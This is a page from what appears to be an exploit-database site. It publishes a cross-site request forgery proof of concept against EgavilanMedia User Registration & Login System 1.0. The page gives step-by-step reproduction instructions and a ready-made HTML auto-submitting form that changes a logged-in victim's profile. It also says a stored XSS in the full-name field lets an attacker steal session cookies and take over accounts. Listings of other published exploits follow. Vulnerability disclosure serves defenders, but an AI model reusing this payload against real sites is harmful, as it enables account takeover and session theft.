Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF"

Author

Exploit author

"Hardik Solanki"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-12-02

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF
# Date: 01-12-2020
# Exploit Author: Hardik Solanki
# Vendor Homepage: http://egavilanmedia.com
# Software Link: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
# Version: 1.0
# Tested on Windows 10

CSRF ATTACK:
Cross-site request forgery (also known as CSRF) is a web security
vulnerability that allows an attacker to induce users to perform actions
that they do not intend to perform. It allows an attacker to partly
circumvent the same-origin policy, which is designed to prevent different
websites from interfering with each other.

Attack Vector:
An attacker can update any user's account. (Note: FULL NAME field is also
vulnerable to stored XSS & attacker can steal the authenticated Session os
the user)

Steps to reproduce:
1. Open user login page using the following URL:
->
http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/login.html

2. Now login with the "attacker" user account & navigate to the edit
profile tab. Click on the "Update" button and intercept the request in web
proxy tool called "Burpusite"

3. Generate the CSRF POC from the burp tool. Copy the URL or Copy the below
code.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="
http://localhost/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile_action.php"
method="POST">
<input type="hidden" name="fullname" value="Attacker" />
<input type="hidden" name="username" value="hunterr" />
<input type="hidden" name="email"
value="noooobhunter&#64;gmail&#46;com" />
<input type="hidden" name="gender" value="Male" />
<input type="hidden" name="action" value="update&#95;user" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

4. Now, login with the "Victim/Normal user" account. (Let that user is
currently authenticated in the browser).

5. Paste the URL in the browser, which is copied in step 3. OR submit the
CSRF POC code, which is shown in step 3.

6. We receive a "Status: Success", which indicates that the CSRF attack is
successfully done & the Attacker can takeover the user account via Stored
XSS (Steal the authenticated Cookies of the user from the "FULL NAME"
parameter)

IMPACT:
An attacker can takeover any user account. (Note: FULL NAME field is also
vulnerable to stored XSS & attacker can steal the authenticated Session os
the user)
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting" webapps multiple "Soushikta Chowdhury"
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF" webapps multiple "Hardik Solanki"
2020-12-02 "Student Result Management System 1.0 - Authentication Bypass SQL Injection" webapps multiple "Ritesh Gohil"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass" webapps multiple "Aakash Madaan"
Release Date Title Type Platform Author
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF" webapps multiple "Hardik Solanki"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49151/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.